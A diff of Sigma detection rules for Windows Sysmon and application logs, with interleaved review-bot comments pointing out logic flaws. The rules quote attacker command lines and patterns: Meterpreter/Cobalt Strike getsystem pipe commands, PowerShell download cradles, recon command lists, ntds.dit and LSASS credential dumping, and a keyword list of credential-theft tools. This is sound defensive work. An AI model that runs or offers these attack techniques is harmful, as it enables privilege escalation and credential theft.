@@ -1,11 +1,10 @@ title: Meterpreter or Cobalt Strike Getsystem Service Installation id: d585ab5a-6a69-49a8-96e8-4a726a54de46 related: - - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 - type: derived + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived status: unsupported -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service installation +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -25,25 +24,29 @@ detection: EventID: 6 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImagePath|contains|all: - - cmd - - /c - - echo - - \pipe\ - - ImagePath|contains|all: - - '%COMSPEC%' - - /c - - echo - - \pipe\ - - ImagePath|contains|all: - - cmd.exe - - /c - - echo - - \pipe\ - - ImagePath|contains|all: - - rundll32 - - .dll,a - - '/p:' + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - cmd + - /c + - echo + - \pipe\ + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - '%COMSPEC%' + - /c + - echo + - \pipe\ + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - cmd.exe + - /c + - echo + - \pipe\ + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + - ImagePath|contains|all: + - rundll32 + - .dll,a + - '/p:' condition: driver_load and selection fields: - ComputerName diff --git a/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml b/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml index 03c6be65a..e6ca66374 100644 
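Review bot: The third `ImagePath|contains|all` block (`cmd.exe`, `/c`, `echo`, `\pipe\`) is fully subsumed by the first (`cmd`, `/c`, `echo`, `\pipe\`): any value containing `cmd.exe` also contains `cmd`, so the first block already matches every event the third could, and the new comment labelling it "technique 1b (expanded %COMSPEC%)" implies a distinct case that does not exist at the matching level. Either drop the third block or state in its comment that it is kept for documentation only, e.g. `# redundant with the cmd block above; kept only to document the expanded-%COMSPEC% form`. Separately, the `%COMSPEC%` block only matches if the service image path is logged unexpanded; that assumption is worth a one-line comment as well.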
--- a/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml +++ b/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml @@ -1,10 +1,9 @@ title: Tap Driver Installation id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb related: - - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 - type: derived -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunnelling techniques + - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 + type: derived +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques status: unsupported author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 diff --git a/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml b/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml index af2ba7ab9..6ab66f58b 100644 --- a/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml +++ b/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml @@ -1,8 +1,6 @@ title: File Creation by Office Applications id: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d -description: This rule will monitor executable and script file creation by office - applications. Please add more file extensions or magic bytes to the logic of your - choice. +description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml 
@@ -21,6 +19,7 @@ logsource: product: windows category: file_event detection: + #useful_information: Please add more file extensions and magic bytes to the logic of your choice. file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml index 8955e89bf..71aa32d30 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml @@ -28,11 +28,10 @@ detection: - \qwinsta.exe - \ipconfig.exe - \hostname.exe - CommandLine|contains: '>>' - CommandLine|endswith: temps.dat + CommandLine|contains: '>>' + CommandLine|endswith: temps.dat selection_persistence: - CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" - /v "WinNetworkSecurity" /t REG_SZ /d + CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinNetworkSecurity" /t REG_SZ /d condition: process_creation and (selection_recon | near selection_persistence) fields: - ComputerName diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml index db9d8c80b..0eb478cbd 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml 
@@ -25,11 +25,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational netCommand1: - CommandLine: net view /DOMAIN + CommandLine: net view /DOMAIN netCommand2: - CommandLine: net session + CommandLine: net session netCommand3: - CommandLine: net share + CommandLine: net share timeframe: 1m condition: process_creation and (netCommand1 | near netCommand2 and netCommand3) falsepositives: diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml index 73329bf98..165b89ed6 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml @@ -1,9 +1,7 @@ title: DNSCat2 Powershell Implementation Detection Via Process Creation id: b11d75d6-d7c1-11ea-87d0-0242ac130003 status: unsupported -description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. - Counting nslookup processes spawned by PowerShell will show hundreds or thousands - of instances if PS DNSCat2 is active locally. +description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. references: - https://github.com/lukebaggett/dnscat2-powershell - https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html @@ -30,7 +28,7 @@ detection: - \powershell.exe - \pwsh.exe Image|endswith: \nslookup.exe - CommandLine|endswith: \nslookup.exe + CommandLine|endswith: \nslookup.exe condition: (process_creation and selection) | count(Image) by ParentImage > 100 fields: - Image 
diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml index ddda9bdd9..8b102328f 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - arp.exe - at.exe - attrib.exe @@ -63,7 +63,6 @@ detection: timeframe: 5m condition: (process_creation and selection) | count() by MachineName > 5 falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: low ruletype: Sigma diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml index 0675d91d7..073197b7e 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml @@ -1,8 +1,7 @@ title: Reconnaissance Activity Using BuiltIn Commands id: 2887e914-ce96-435f-8105-593937e90757 status: unsupported -description: Detects execution of a set of builtin commands often used in recon stages - by different attack groups +description: Detects execution of a set of builtin commands often used in recon stages by different attack groups references: - https://twitter.com/haroonmeer/status/939099379834658817 - https://twitter.com/c_APT_ure/status/939475433711722497 
@@ -24,29 +23,28 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine: - - tasklist - - net time - - systeminfo - - whoami - - nbtstat - - net start - - qprocess - - nslookup - - hostname.exe - - netstat -an - - CommandLine|endswith: - - \net1 start - - \net1 user /domain - - \net1 group /domain - - \net1 group "domain admins" /domain - - \net1 group "Exchange Trusted Subsystem" /domain - - \net1 accounts /domain - - \net1 user net localgroup administrators + - CommandLine: + - tasklist + - net time + - systeminfo + - whoami + - nbtstat + - net start + - qprocess + - nslookup + - hostname.exe + - netstat -an + - CommandLine|endswith: + - \net1 start + - \net1 user /domain + - \net1 group /domain + - \net1 group "domain admins" /domain + - \net1 group "Exchange Trusted Subsystem" /domain + - \net1 accounts /domain + - \net1 user net localgroup administrators timeframe: 15s condition: (process_creation and selection) | count() by CommandLine > 4 falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml index 62754e1d9..d65fdee90 100644 --- a/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml +++ b/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml 
@@ -1,7 +1,6 @@ title: MSI Spawned Cmd and Powershell Spawned Processes id: 38cf8340-461b-4857-bf99-23a41f772b18 -description: This rule looks for Windows Installer service (msiexec.exe) spawning - command line and/or powershell that spawns other processes +description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes status: unsupported author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 @@ -15,8 +14,7 @@ tags: logsource: product: windows category: process_creation - definition: Works only if Enrich Sysmon events with additional information about - process in ParentOfParentImage check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section detection: process_creation: EventID: 1 @@ -39,6 +37,6 @@ falsepositives: - Unknown level: high enrichment: - - EN_0001_cache_sysmon_event_id_1_info - - EN_0002_enrich_sysmon_event_id_1_with_parent_info + - EN_0001_cache_sysmon_event_id_1_info # http://bit.ly/314zc6x + - EN_0002_enrich_sysmon_event_id_1_with_parent_info # http://bit.ly/2KmSC0l ruletype: Sigma diff --git a/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml b/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml index e4867fb17..dd4684dfa 100644 --- a/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml +++ b/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml @@ -1,7 +1,6 @@ title: Files Dropped to Program Files by Non-Priviledged Process id: d6d9f4fb-4c1c-4f53-b306-62a22c7c61e1 -description: Search for dropping of files to Windows/Program Files fodlers by non-priviledged - processes +description: Search for dropping of files to Windows/Program Files fodlers by non-priviledged processes status: experimental author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community date: 2020/10/17 
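Review bot: In the last hunk the two enrichment entries now carry `# http://bit.ly/314zc6x` and `# http://bit.ly/2KmSC0l` as their only pointer to what `EN_0001_cache_sysmon_event_id_1_info` and `EN_0002_enrich_sysmon_event_id_1_with_parent_info` mean. Shortener links are opaque, plain-http and can be retargeted by whoever controls the shortener account, so a reader cannot verify the enrichment definition without following an untrusted redirect, and the `definition:` line already says the rule only works when that enrichment is in place. I would replace each with the canonical URL of the enrichment definition (placeholder: `# <canonical URL of the EN_0001 definition>`) or move it into `references:`. The same two short links are added to the enrichment list of the Detection of Possible Rotten Potato rule further down.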
diff --git a/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml index c7da4c317..af978fcf2 100644 --- a/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml +++ b/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml @@ -1,7 +1,6 @@ title: Windows Kernel and 3rd-Party Drivers Exploits Token Stealing id: 8065b1b4-1778-4427-877f-6bf948b26d38 -description: Detection of child processes spawned with SYSTEM privileges by parents - with non-SYSTEM privileges and Medium integrity level +description: Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level references: - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment tags: @@ -14,8 +13,7 @@ date: 2019/06/03 logsource: category: process_creation product: windows - definition: Works only if Enrich Sysmon events with additional information about - process in ParentIntegrityLevel check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section detection: process_creation: EventID: 1 @@ -28,4 +26,5 @@ detection: falsepositives: - Unknown level: high + ruletype: Sigma diff --git a/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml b/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml index 33ad78057..cb9c56b10 100644 --- a/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml +++ b/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml 
@@ -1,13 +1,12 @@ title: Detection of Possible Rotten Potato id: 6c5808ee-85a2-4e56-8137-72e5876a5096 -description: Detection of child processes spawned with SYSTEM privileges by parents - with LOCAL SERVICE or NETWORK SERVICE privileges +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ tags: - attack.privilege_escalation - - attack.t1134 + - attack.t1134 # an old one - attack.t1134.002 - sysmon status: unsupported @@ -17,8 +16,7 @@ modified: 2020/09/01 logsource: category: process_creation product: windows - definition: Works only if Enrich Sysmon events with additional information about - process in ParentUser check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentUser check enrichment section detection: process_creation: EventID: 1 @@ -30,12 +28,12 @@ detection: User: NT AUTHORITY\SYSTEM rundllexception: Image|endswith: \rundll32.exe - CommandLine|contains: DavSetCookie + CommandLine|contains: DavSetCookie condition: process_creation and (selection and not rundllexception) falsepositives: - Unknown level: high enrichment: - - EN_0001_cache_sysmon_event_id_1_info - - EN_0002_enrich_sysmon_event_id_1_with_parent_info + - EN_0001_cache_sysmon_event_id_1_info # http://bit.ly/314zc6x + - EN_0002_enrich_sysmon_event_id_1_with_parent_info # http://bit.ly/2KmSC0l ruletype: Sigma diff --git a/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml b/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml index dfc9b98b4..934911414 100644 --- a/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml 
+++ b/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml @@ -1,8 +1,7 @@ title: Suspicious Werfault.exe Network Connection Outbound id: e12c75f2-d09e-43f6-90e4-6a23842907af status: experimental -description: Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised - systems to legitimate werfault.exe process to avoid detection. +description: Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection. references: - https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/ author: Sreeman @@ -43,10 +42,8 @@ detection: DestinationHostname|contains: - '*.windowsupdate.com' - '*.microsoft.com' - condition: network_connection and (selection and not ( filter1 and filter2 and - filter3 )) + condition: network_connection and (selection and not ( filter1 and filter2 and filter3 )) falsepositives: - - Communication to other corporate systems that use IP addresses from public address - spaces and Microsoft IP spaces + - Communication to other corporate systems that use IP addresses from public address spaces and Microsoft IP spaces level: medium ruletype: Sigma diff --git a/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml b/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml index 895480e6e..8638e4fde 100644 --- a/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml +++ b/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml 
@@ -1,8 +1,7 @@
 title: Suspicious Scripting in a WMI Consumer
 id: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0
 status: experimental
-description: Detects suspicious commands that are related to scripting/powershell
- in WMI Event Consumers
+description: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
 references:
 - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/
 - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19
@@ -25,22 +24,22 @@ detection:
 - 21
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_destination:
- - Destination|contains|all:
- - new-object
- - net.webclient
- - .downloadstring
- - Destination|contains|all:
- - new-object
- - net.webclient
- - .downloadfile
- - Destination|contains:
- - ' iex('
- - ' -nop '
- - ' -noprofile '
- - ' -decode '
- - ' -enc '
- - WScript.Shell
- - System.Security.Cryptography.FromBase64Transform
+ - Destination|contains|all:
+ - new-object
+ - net.webclient
+ - .downloadstring
+ - Destination|contains|all:
+ - new-object
+ - net.webclient
+ - .downloadfile
+ - Destination|contains:
+ - ' iex('
+ - ' -nop '
+ - ' -noprofile '
+ - ' -decode '
+ - ' -enc '
+ - WScript.Shell
+ - System.Security.Cryptography.FromBase64Transform
 condition: wmi_event and selection_destination
 fields:
 - User
diff --git a/tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml b/tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml
new file mode 100644
index 000000000..0e6c0bce3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml
@@ -0,0 +1,106 @@
+title: Relevant Anti-Virus Signature Keywords In Application Log
+id: 78bc5783-81d9-4d73-ac97-59f6db4f72a8
+status: test
+description: Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
+references:
+ - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31
+ - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed
+ - https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01
+author: Florian Roth (Nextron Systems), Arnim Rupp
+date: 2017/02/19
+modified: 2023/11/22
+tags:
+ - attack.resource_development
+ - attack.t1588
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ keywords:
+ - Adfind
+ - ASP/BackDoor
+ - ATK/
+ - Backdoor.ASP
+ - Backdoor.Cobalt
+ - Backdoor.JSP
+ - Backdoor.PHP
+ - Blackworm
+ - Brutel
+ - BruteR
+ - Chopper
+ - Cobalt
+ - COBEACON
+ - Cometer
+ - CRYPTES
+ - Cryptor
+ - Destructor
+ - DumpCreds
+ - Exploit.Script.CVE
+ - FastReverseProxy
+ - Filecoder
+ - GrandCrab
+ - HackTool
+ - 'HKTL:'
+ - HKTL.
+ - HKTL/
+ - HTool
+ - IISExchgSpawnCMD
+ - Impacket
+ - JSP/BackDoor
+ - Keylogger
+ - Koadic
+ - Krypt
+ - Lazagne
+ - Metasploit
+ - Meterpreter
+ - MeteTool
+ - Mimikatz
+ - Mpreter
+ - Nighthawk
+ - Packed.Generic.347
+ - PentestPowerShell
+ - Phobos
+ - PHP/BackDoor
+ - PowerSploit
+ - PowerSSH
+ - PshlSpy
+ - PSWTool
+ - PWCrack
+ - PWDump
+ - Ransom
+ - Rozena
+ - Ryzerlo
+ - Sbelt
+ - Seatbelt
+ - SecurityTool
+ - SharpDump
+ - Sliver
+ - Splinter
+ - Swrort
+ - Tescrypt
+ - TeslaCrypt
+ - Valyria
+ - Webshell
+ # - 'FRP.'
+ # - 'PWS.'
+ # - 'PWSX'
+ # - 'Razy'
+ # - 'Ryuk'
+ # - 'Locker'
+ # - 'Potato'
+ filter_optional_generic:
+ - Keygen
+ - Crack
+ - anti_ransomware_service.exe
+ - cyber-protect-service.exe
+ filter_optional_information:
+ Level: 4 # Information level
+ filter_optional_restartmanager:
+ Provider_Name: Microsoft-Windows-RestartManager
+ condition: application and (keywords and not 1 of filter_optional_*)
+falsepositives:
+ - Some software piracy tools (key generators, cracks) are classified as hack tools
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml b/tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml
new file mode 100644
index 000000000..44fba0f5a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml
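Review bot: The `Crack` entry under `filter_optional_generic` is a substring of the `PWCrack` keyword, so every event that matches `PWCrack` also matches the filter and is dropped by `not 1 of filter_optional_*`; that keyword can never produce an alert. Keyword-list filters match anywhere in the event text, so the piracy-tool exclusion should be narrowed to the exact signature fragment that causes the false positive rather than the bare word `Crack`, or `PWCrack` should be removed with a comment stating it is intentionally shadowed. The disabled entries from `# - 'FRP.'` through `# - 'Potato'` carry no reason; a one-line comment above the block such as `# disabled: too generic, see falsepositives` would keep that decision with the rule.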
@@ -0,0 +1,35 @@
+title: Microsoft Malware Protection Engine Crash
+id: 545a5da6-f103-4919-a519-e9aec1026ee4
+related:
+ - id: 6c82cf5c-090d-4d57-9188-533577631108
+ type: similar
+status: experimental
+description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
+references:
+ - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
+ - https://technet.microsoft.com/en-us/library/security/4022344
+author: Florian Roth (Nextron Systems)
+date: 2017/05/09
+modified: 2023/04/14
+tags:
+ - attack.defense_evasion
+ - attack.t1211
+ - attack.t1562.001
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: Application Error
+ EventID: 1000
+ Data|contains|all:
+ - MsMpEng.exe
+ - mpengine.dll
+ condition: application and selection
+falsepositives:
+ - MsMpEng might crash if the "C:\" partition is full
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml b/tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml
new file mode 100644
index 000000000..1a1ab0f85
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml
@@ -0,0 +1,29 @@
+title: Potential Credential Dumping Via WER - Application
+id: a18e0862-127b-43ca-be12-1a542c75c7c5
+status: test
+description: Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential
+references:
+ - https://github.com/deepinstinct/Lsass-Shtinkering
+ - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
+ - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/12/07
+tags:
+ - attack.credential_access
+ - attack.t1003.001
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: Application Error
+ EventID: 1000
+ AppName: lsass.exe
+ ExceptionCode: c0000001 # STATUS_UNSUCCESSFUL
+ condition: application and selection
+falsepositives:
+ - Rare legitimate crashing of the lsass process
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml
new file mode 100644
index 000000000..54898dca6
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml
@@ -0,0 +1,32 @@
+title: Ntdsutil Abuse
+id: e6e88853-5f20-4c4a-8d26-cd469fd8d31f
+status: test
+description: Detects potential abuse of ntdsutil to dump ntds.dit database
+references:
+ - https://twitter.com/mgreen27/status/1558223256704122882
+ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/08/14
+tags:
+ - attack.credential_access
+ - attack.t1003.003
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: ESENT
+ EventID:
+ - 216
+ - 325
+ - 326
+ - 327
+ Data|contains: ntds.dit
+ condition: application and selection
+falsepositives:
+ - Legitimate backup operation/creating shadow copies
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml
new file mode 100644
index 000000000..2a9b1485f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml
@@ -0,0 +1,38 @@
+title: Dump Ntds.dit To Suspicious Location
+id: 94dc4390-6b7c-4784-8ffc-335334404650
+status: test
+description: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location
+references:
+ - https://twitter.com/mgreen27/status/1558223256704122882
+ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/08/14
+modified: 2023/10/23
+tags:
+ - attack.execution
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection_root:
+ Provider_Name: ESENT
+ EventID: 325 # New Database Created
+ Data|contains: ntds.dit
+ selection_paths:
+ Data|contains:
+ # Add more locations that you don't use in your env or that are just suspicious
+ - :\ntds.dit
+ - \Appdata\
+ - \Desktop\
+ - \Downloads\
+ - \Perflogs\
+ - \Temp\
+ - \Users\Public\
+ condition: application and (all of selection_*)
+falsepositives:
+ - Legitimate backup operation/creating shadow copies
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml b/tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml
new file mode 100644
index 000000000..5aea8a523
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml
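Review bot: `tags` lists only `attack.execution`, while the sibling rule for the same ESENT 325 ntds.dit event (win_esent_ntdsutil_abuse.yml, earlier in this patch) is tagged `attack.credential_access` and `attack.t1003.003`; dumping ntds.dit is credential access whatever the destination path, so the two rules should agree. Suggest adding `- attack.credential_access` and `- attack.t1003.003` under `tags`, or a comment recording why this rule is classified differently from its sibling.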
@@ -0,0 +1,45 @@
+title: Audit CVE Event
+id: 48d91a3a-2363-43ba-a456-ca71ac3da5c2
+status: test
+description: |
+ Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.
+ MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.
+ Unfortunately, that is about the only instance of CVEs being written to this log.
+references:
+ - https://twitter.com/VM_vivisector/status/1217190929330655232
+ - https://twitter.com/DidierStevens/status/1217533958096924676
+ - https://twitter.com/FlemmingRiis/status/1217147415482060800
+ - https://www.youtube.com/watch?v=ebmW42YYveI # "CVEs in Windows Event Logs? What You Need to Know" by 13Cubed.
+ - https://nullsec.us/windows-event-log-audit-cve/
+author: Florian Roth (Nextron Systems), Zach Mathis
+date: 2020/01/15
+modified: 2022/10/22
+tags:
+ - attack.execution
+ - attack.t1203
+ - attack.privilege_escalation
+ - attack.t1068
+ - attack.defense_evasion
+ - attack.t1211
+ - attack.credential_access
+ - attack.t1212
+ - attack.lateral_movement
+ - attack.t1210
+ - attack.impact
+ - attack.t1499.004
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name:
+ - Microsoft-Windows-Audit-CVE
+ - Audit-CVE
+ EventID: 1
+ condition: application and selection
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
